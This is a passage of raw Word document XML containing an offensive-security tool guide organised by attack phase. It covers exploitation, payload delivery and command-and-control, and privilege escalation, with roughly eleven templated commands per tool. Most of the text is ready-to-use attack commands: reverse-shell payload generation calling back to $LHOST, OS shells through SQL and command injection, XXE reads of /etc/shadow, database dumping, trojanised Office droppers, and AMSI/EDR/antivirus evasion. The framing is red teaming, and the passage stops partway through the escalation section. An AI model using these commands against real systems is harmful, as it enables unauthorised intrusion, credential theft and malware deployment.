        <w:t>The world's most used penetration testing framework with 2000+ exploit modules. Provides a unified console for exploitation, payload generation, and session management with unmatched reliability and depth.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msfconsole -x 'use $EXPLOIT; set RHOSTS $TARGET; set LHOST $LHOST; set PAYLOAD $PAYLOAD; exploit'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msfconsole -x 'use exploit/multi/handler; set PAYLOAD $PAYLOAD; set LHOST $LHOST; set LPORT $LPORT; exploit -j'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msfconsole -x 'search $CVE; use $EXPLOIT; set RHOSTS $TARGET; check'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msfconsole -x 'use auxiliary/scanner/http/dir_scanner; set RHOSTS $TARGET; set PATH $PATH; run'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msfconsole -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS $TARGET; run'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msfconsole -x 'use exploit/windows/smb/psexec; set RHOST $TARGET; set SMBUSER $USER; set SMBPASS $PASS; exploit'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msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; set RHOSTS $TARGET; set USERPASS_FILE $FILE; run'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msfconsole -x 'use auxiliary/scanner/http/wordpress_scanner; set RHOSTS $TARGET; run'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msfconsole -x 'use exploit/multi/http/struts2_content_type_ognl; set RHOST $TARGET; set LHOST $LHOST; exploit'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msfconsole -x 'use auxiliary/scanner/http/log4shell_scanner; set RHOSTS $TARGET; set RPORT $PORT; run'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msfconsole -x 'use auxiliary/scanner/http/title; set RHOSTS $TARGET; set RPORT $PORT; run'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. SQLMap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The gold standard for automated SQL injection detection and exploitation. Supports 6 database engines with comprehensive enumeration, data extraction, and OS-level access capabilities.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sqlmap -u '$URL' --batch --random-agent --level=3 --risk=2 -o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sqlmap -u '$URL' --batch --dbs --random-agent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sqlmap -u '$URL' --batch -D $DB --tables --random-agent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sqlmap -u '$URL' --batch -D $DB -T $TABLE --dump --random-agent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sqlmap -u '$URL' --batch --os-shell --random-agent --technique=E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sqlmap -u '$URL' --batch --os-pwn --random-agent --technique=E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sqlmap -u '$URL' --batch --banner --current-user --current-db --random-agent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sqlmap -u '$URL' --batch --file-read='$FILE' --random-agent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sqlmap -u '$URL' --batch --file-write='$LOCAL' --file-dest='$REMOTE' --random-agent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sqlmap -r $REQUEST_FILE --batch --level=5 --risk=3 --random-agent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sqlmap -u '$URL' --batch --cookie='$COOKIE' --level=3 --dump-all --random-agent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3. Nuclei</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProjectDiscovery's fast template-based vulnerability scanner with 9000+ community templates. AI-enhanced template generation delivers same-day CVE coverage with precise, low-noise output.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nuclei -l $URLS -t cves/ -severity critical,high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nuclei -u $URL -t $TEMPLATE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nuclei -l $URLS -t vulnerabilities/ -severity critical,high,medium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nuclei -l $URLS -t exposed-panels/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nuclei -l $URLS -t misconfiguration/ -severity high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nuclei -l $URLS -t technologies/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nuclei -l $URLS -t dns/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nuclei -l $URLS -t ssl/ -severity high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nuclei -l $URLS -t workflows/ -w $WORKFLOW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nuclei -l $URLS -t network/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nuclei -l $URLS -t http/ -severity critical -rate-limit 100 -o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4. FFUF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Lightning-fast web fuzzer written in Go. Excels at directory discovery, virtual host enumeration, parameter fuzzing, and authentication bypass with exceptional speed and flexible output options.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ffuf -u $URL/FUZZ -w $WORDLIST -mc 200,204,301,302,307,401,403,405 -o $OUTPUT -of json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ffuf -u $URL -H 'Host: FUZZ.$DOMAIN' -w $WORDLIST -mc 200 -o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ffuf -u $URL?FUZZ=test -w $WORDLIST -mc 200 -o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ffuf -u $URL -X POST -d 'FUZZ=test' -w $WORDLIST -mc 200 -o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ffuf -u $URL -H 'FUZZ: test' -w $WORDLIST -mc 200 -o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ffuf -u $URL -b 'FUZZ=test' -w $WORDLIST -mc 200 -o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ffuf -w $USERLIST:USER -w $PASSLIST:PASS -u $URL -X POST -d 'user=USER&amp;pass=PASS' -fc 401 -o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ffuf -u $URL/FUZZ -w $WORDLIST -e .php,.bak,.old,.txt -mc 200 -o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ffuf -u $URL/FUZZ -w $WORDLIST -recursion -mc 200 -o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ffuf -u $URL -request $REQ_FILE -w $WORDLIST -mc 200 -o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ffuf -u $URL/FUZZ -w $WORDLIST -t 100 -p 0.1 -mc 200 -o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5. Commix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Specialized command injection exploitation tool with automated detection and exploitation capabilities. Supports multiple injection techniques, shellcode generation, and file upload abuse for system access.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commix.py -u '$URL' --batch --all --level=3 -o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commix.py -u '$URL' --data='$DATA' --batch --all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commix.py -u '$URL' --cookie='$COOKIE' --batch --os-cmd='id'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commix.py -u '$URL' --batch --os-shell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commix.py -u '$URL' --batch --file-upload='$LOCAL,$REMOTE'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commix.py -u '$URL' --headers --batch --all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commix.py -u '$URL' --batch --technique=c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commix.py -u '$URL' --batch --web-root='$PATH'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commix.py -u '$URL' --batch --alter-shell='/bin/bash'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commix.py -u '$URL' --batch --msf-path='$PATH'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commix.py -u '$URL' --batch --ignore-401 --all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6. XXEinjector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Specialized XML External Entity injection exploitation framework. Provides automated XXE detection, data extraction, SSRF exploitation, and RCE through advanced XML injection techniques.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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --path=$FILE_PATH --oob=http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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --path=/etc/passwd --oob=http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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --path=/proc/self/environ --oob=http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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --ssrf=http://$TARGET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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --xslt=1 --oob=http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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --path=/etc/shadow --direct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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --enum-ports=1-1000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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --cisco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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --jar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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE -- Php://filter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XXEinjector.rb --host=$LHOST --file=$REQUEST_FILE --path=file:///etc/hostname --direct</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. SSTImap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Advanced Server-Side Template Injection detection and exploitation tool. Auto-detects 15+ template engines and provides sandbox escape for RCE across multiple web frameworks.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sstimap.py -u '$URL' -s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sstimap.py -u '$URL' -d '$DATA' -s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sstimap.py -u '$URL' -C '$COOKIE' -s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sstimap.py -u '$URL' -H '$HEADER' -s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sstimap.py -u '$URL' -s --os-shell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sstimap.py -u '$URL' -s --os-cmd 'id'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sstimap.py -u '$URL' -s --level 5 -o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sstimap.py -u '$URL' -s -e jinja2 -o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sstimap.py -u '$URL' -s --load-modules $MODULE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sstimap.py -u '$URL' -s --tamper $TAMPER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sstimap.py -u '$URL' -s -f $FILE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8. LDAP Injection Scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Specialized tool for detecting and exploiting LDAP injection vulnerabilities. Enables authentication bypass, data extraction, and directory traversal through crafted LDAP queries.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ldap-injection-scanner.py -u '$URL' --payloads $PAYLOADS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ldap-injection-scanner.py -u '$URL' --login-forms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ldap-injection-scanner.py -u '$URL' --blind --time-based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ldap-injection-scanner.py -u '$URL' --dump-users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ldap-injection-scanner.py -u '$URL' --auth-bypass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ldap-injection-scanner.py -u '$URL' --enumerate-ou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ldap-injection-scanner.py -u '$URL' --extract-schema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ldap-injection-scanner.py -u '$URL' --max-objects 1000 -o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ldap-injection-scanner.py -u '$URL' --wildcard-injection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ldap-injection-scanner.py -u '$URL' --filter-bypass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ldap-injection-scanner.py -u '$URL' --proxy $PROXY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9. XSpear</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Powerful XSS detection and exploitation tool with dynamic payload generation, DOM scanning, and blind XSS callback integration. Uses machine learning for context-aware payload selection.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XSpear -u '$URL'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XSpear -u '$URL' --cookie='$COOKIE'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XSpear -u '$URL' --data='$POST_DATA'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XSpear -u '$URL' --headers '$HEADERS'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XSpear -u '$URL' --blind='$CALLBACK'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XSpear -u '$URL' --dom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XSpear -u '$URL' --custom-payload='$PAYLOAD_FILE'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XSpear -u '$URL' --auto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XSpear -u '$URL' --reflection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XSpear -u '$URL' --selenium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ruby XSpear -u '$URL' --level=3 -o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10. Oralyzer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Automated Oracle SQL injection exploitation tool. Detects injection points, extracts database schema, dumps data, and achieves OS-level access through Oracle-specific techniques.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oralyzer.py -u '$URL' --dump-all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oralyzer.py -u '$URL' --dbs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oralyzer.py -u '$URL' -D $DB --tables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oralyzer.py -u '$URL' -D $DB -T $TABLE --dump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oralyzer.py -u '$URL' --os-shell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oralyzer.py -u '$URL' --banner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oralyzer.py -u '$URL' --current-user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oralyzer.py -u '$URL' --privileges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oralyzer.py -u '$URL' --roles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oralyzer.py -u '$URL' --file-read='$FILE'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oralyzer.py -u '$URL' --blind -o $OUTPUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 4: Delivery</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc004" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Crafting and deploying payloads to target systems through various delivery mechanisms. This phase focuses on creating reliable, evasive payloads and establishing command and control channels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Each tool is selected for payload flexibility, evasion capabilities, and proven effectiveness across diverse target environments and security postures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Metasploit's dedicated payload generator that creates customized executables, scripts, and shellcode for multiple platforms. Supports 500+ payload formats with advanced encoding and evasion options.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msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f exe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msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f elf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msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f macho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msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -e x86/shikata_ga_nai -i 10 -f exe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msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f raw | base64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msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f asp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msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f aspx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msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f war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msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f java/jsp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msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f ps1 -o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msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -f apk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2. Sliver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Bishop Fox's modern cross-platform implant framework. Supports multiple C2 transports including mTLS, HTTP(S), DNS, and WireGuard with per-binary compilation for reduced detection footprint.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generate --mtls $LHOST --save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generate --http http://$LHOST:$LPORT --save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generate --dns $DOMAIN --save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generate --http http://$LHOST --format shellcode -G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generate --http http://$LHOST --format shared -G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generate --http http://$LHOST --format service -G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generate --http http://$LHOST --os windows -G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generate --http http://$LHOST --os linux -G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generate --http http://$LHOST --os macos -G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generate --http http://$LHOST --skip-symbols -G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generate --http http://$LHOST --limit-datetime '$DATE' -G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3. Havoc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Modern open-source command and control framework with a focus on usability and evasion. Features demon implants with sleep mask kits, x64 return address stack spoofing, and indirect syscalls.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server --profile $PROFILE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payload demon --arch x64 --format exe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payload demon --arch x64 --format dll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payload demon --arch x64 --format shellcode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payload demon --arch x64 --format service-exe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payload demon --sleep $JITTER --arch x64 --format exe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payload demon --arch x64 --format pspowershell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payload demon --arch x64 --format raw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payload demon --arch x64 --format dotnet-exe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payload demon --arch x64 --format dotnet-dll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payload demon --arch x64 --format syscall-shellcode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4. SharpShooter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Reliable payload delivery framework for JavaScript and VBScript payloads. Generates HTA, JS, VBS, and WSF files with embedded shellcode and staged delivery options.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SharpShooter.py --stageless --dotnetv2 --payload $PAYLOAD --output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SharpShooter.py --stageless --rawscfile $SHELLCODE --output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SharpShooter.py --stageless --dotnetv2 --payload js --output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SharpShooter.py --stageless --dotnetv2 --payload vbs --output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SharpShooter.py --stageless --dotnetv2 --payload hta --output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SharpShooter.py --stageless --dotnetv2 --payload wsf --output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SharpShooter.py --stageless --dotnetv2 --payload macro --output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SharpShooter.py --stageless --dotnetv2 --payload macro-less --output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SharpShooter.py --stager js --dotnetv2 --sandbox --output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SharpShooter.py --stager vbs --dotnetv2 --sandbox --output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SharpShooter.py --stageless --dotnetv2 --payload js --smuggle --output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5. Donut</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Position-independent shellcode generator that executes .NET assemblies, EXEs, DLLs, VBS, JS, and XSL files directly in memory. Essential for fileless payload execution and evasion.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donut -f $FILE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donut -f $FILE -a 1 -o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donut -f $FILE -a 2 -o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donut -f $FILE -b 1 -o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donut -f $FILE -b 2 -o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donut -f $FILE -b 3 -o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donut -f $FILE -e 1 -o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donut -f $FILE -e 2 -o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donut -f $FILE -z 2 -o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donut -f $FILE -p '$PARAMS'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donut -f $FILE -i '$INSTANCE'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6. ScareCrow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Payload creation framework that sideloads into legitimate Windows binaries. Uses EDR bypass techniques, sandbox evasion, and legitimate certificate signing for highly evasive payload delivery.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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery binary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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery dll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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery excel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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery msiexec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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery wscript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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery binary -loader control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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery binary -injection C:\Windows\explorer.exe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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery binary -sandbox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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery binary -nosign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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery binary -pass $PASSWORD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ScareCrow -I $SHELLCODE -domain $DOMAIN -delivery binary -mdl $URL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7. MacroPack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Advanced Office document and script payload generator. Creates VBA, VBS, HTA, and PowerShell payloads embedded in Office documents with anti-analysis and sandbox evasion features.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macro_pack.py -t DROPPER -G $OUTPUT --vbom-encode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macro_pack.py -t EMBED_EXE -G $OUTPUT -e $EXE --vbom-encode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macro_pack.py -t DDE -G $OUTPUT --vbom-encode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macro_pack.py -t CMD -G $OUTPUT -c '$COMMAND' --vbom-encode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macro_pack.py -t DROPPER_PS -G $OUTPUT --vbom-encode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macro_pack.py -t DROPPER_DLL -G $OUTPUT -d $DLL --vbom-encode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macro_pack.py -t EMBED_DLL -G $OUTPUT -e $DLL --vbom-encode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macro_pack.py -t DROPPER64 -G $OUTPUT --vbom-encode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macro_pack.py -t METERPRETER -G $OUTPUT --vbom-encode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macro_pack.py -t EMBED_EXE -G $OUTPUT -e $EXE --trojan --input $DECOY --vbom-encode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macro_pack.py -t DROPPER -t DROPPER_PS -G $OUTPUT --bypass --vbom-encode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. Unicorn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Simple and effective PowerShell downgrade attack and direct shellcode injection tool. Generates PowerShell payloads that bypass AMSI and execute shellcode directly in memory.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unicorn.py $PAYLOAD $LHOST $LPORT powershell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unicorn.py $PAYLOAD $LHOST $LPORT macro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unicorn.py $PAYLOAD $LHOST $LPORT hta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unicorn.py $PAYLOAD $LHOST $LPORT dde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unicorn.py $PAYLOAD $LHOST $LPORT cerutil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unicorn.py $PAYLOAD $LHOST $LPORT cs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unicorn.py $PAYLOAD $LHOST $LPORT pth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unicorn.py $PAYLOAD $LHOST $LPORT custom_ps1 $OUTPUT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unicorn.py $PAYLOAD $LHOST $LPORT macroless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unicorn.py $PAYLOAD $LHOST $LPORT windows/meterpreter/reverse_https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python3 unicorn.py $PAYLOAD $LHOST $LPORT reverse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9. Veil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Evasion framework designed to bypass common anti-virus solutions. Generates metasploit payloads with encrypted shellcode and custom loaders for Windows environments.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veil -t Evasion -p $PAYLOAD --ip $LHOST --port $LPORT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veil -t Evasion -p go/meterpreter/rev_https --ip $LHOST --port $LPORT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veil -t Evasion -p python/meterpreter/rev_https --ip $LHOST --port $LPORT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veil -t Evasion -p ruby/meterpreter/rev_https --ip $LHOST --port $LPORT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veil -t Evasion -p powershell/meterpreter/rev_https --ip $LHOST --port $LPORT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veil -t Evasion -p cs/meterpreter/rev_https --ip $LHOST --port $LPORT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veil -t Evasion -p $PAYLOAD --ip $LHOST --port $LPORT --ordnance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veil -t Evasion -p $PAYLOAD --ip $LHOST --port $LPORT --compiler py2exe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veil -t Evasion -p $PAYLOAD --ip $LHOST --port $LPORT --sandbox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veil -t Ordnance -p rev_tcp --ip $LHOST --port $LPORT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veil -t Ordnance -p rev_http --ip $LHOST --port $LPORT --encoders xor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10. Mythic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Collaborative red teaming framework with containerized architecture. Supports multiple payload types across platforms with a modern web UI and extensive agent customization capabilities.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mythic-cli payload create $AGENT_TYPE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mythic-cli payload create apfell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mythic-cli payload create poseidon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mythic-cli payload create poseidon -o $OUTPUT --format dylib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mythic-cli payload create poseidon -o $OUTPUT --format macho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mythic-cli payload create apfell -o $OUTPUT --c2 http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mythic-cli payload create apfell -o $OUTPUT --c2 websocket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mythic-cli payload create $AGENT -o $OUTPUT --callback-interval $INTERVAL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mythic-cli payload create $AGENT -o $OUTPUT --callback-jitter $JITTER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mythic-cli payload create $AGENT -o $OUTPUT --commands $CMDS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mythic-cli payload create $AGENT -o $OUTPUT --killdate $DATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 5: Escalation</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc005" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Elevating privileges from standard user to administrator or root level access. This phase focuses on automated enumeration, kernel exploitation, and misconfiguration abuse across Windows and Linux environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tools are ranked by their ability to quickly surface actionable escalation vectors with minimal false positives and clear output formatting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. LinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The gold standard for Linux privilege escalation enumeration. Color-coded output highlights 95% confidence escalation paths including SUID binaries, sudo misconfigurations, and kernel vulnerabilities.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linpeas.sh -a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linpeas.sh -s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linpeas.sh -P $PASSWORD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linpeas.sh -k $KEYWORD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linpeas.sh -e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linpeas.sh -o $OUTPUT 2&gt;&amp;1 | tee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linpeas.sh -q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linpeas.sh -D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linpeas.sh -t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linpeas.sh -d $DIR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linpeas.sh -i $IP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2. WinPEAS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Windows equivalent of LinPEAS providing comprehensive privilege escalation enumeration. Detects unquoted service paths, registry misconfigurations, weak permissions, and credential storage issues.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winPEASany.exe cmd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winPEASany.exe cmd fast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winPEASany.exe cmd searchall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winPEASany.exe cmd systeminfo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winPEASany.exe cmd userinfo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winPEASany.exe cmd eventsinfo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winPEASany.exe cmd appsinfo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winPEASany.exe cmd networkinfo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winPEASany.exe cmd servicesinfo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winPEASany.exe cmd processinfo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winPEASany.exe cmd windowscreds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3. Linux Exploit Suggester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fast kernel vulnerability identification tool that matches running kernel versions against known privilege escalation exploits. Essential for quickly identifying kernel-based escalation paths.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linux-exploit-suggester.sh --kernel $VERSION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linux-exploit-suggester.sh -k $VERSION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uname -r | xargs linux-exploit-suggester.sh -k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linux-exploit-suggester.sh --checksec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linux-exploit-suggester.sh -d $DOWNLOAD_DIR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linux-exploit-suggester.sh --fetch-urls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linux-exploit-suggester.sh -p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linux-exploit-suggester.sh --skip-more-checks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linux-exploit-suggester.sh --full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linux-exploit-suggester.sh -k $VERSION --no-color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linux-exploit-suggester.sh -k $VERSION --skip-pkg-versions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4. Windows Exploit Suggester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Python tool that compares Windows patch levels against the Microsoft vulnerability database to identify missing patches and corresponding exploitability.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windows-exploit-suggester.py --systeminfo $SYSINFO --database $DB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windows-exploit-suggester.py --systeminfo $SYSINFO -i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windows-exploit-suggester.py --systeminfo $SYSINFO -p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windows-exploit-suggester.py --systeminfo $SYSINFO -l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windows-exploit-suggester.py --systeminfo $SYSINFO --ostext '$OS_STRING'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windows-exploit-suggester.py --systeminfo $SYSINFO -a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windows-exploit-suggester.py --systeminfo $SYSINFO --updates $UPDATES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windows-exploit-suggester.py --systeminfo $SYSINFO --hide $KB_LIST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windows-exploit-suggester.py --systeminfo $SYSINFO -q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windows-exploit-suggester.py --systeminfo $SYSINFO --use-api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windows-exploit-suggester.py --systeminfo $SYSINFO -t 2017-03-14 -o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5. BeRoot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Modular privilege escalation checker for Windows, Linux, and Mac. Scans for misconfigurations, weak permissions, and known escalation vectors with a focus on actionable results.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beRoot.py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beRoot.py -c $CONFIG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beRoot.py -p $PASSWORD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beRoot.py -k $KERNEL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beRoot.py -l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beRoot.py -w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beRoot.py -m $MODULE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beRoot.py -o $OUTPUT --format json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beRoot.py -o $OUTPUT --exclude $EXCLUDE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beRoot.py -s $SERVICE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beRoot.py -f $FILE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6. PrivescCheck</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
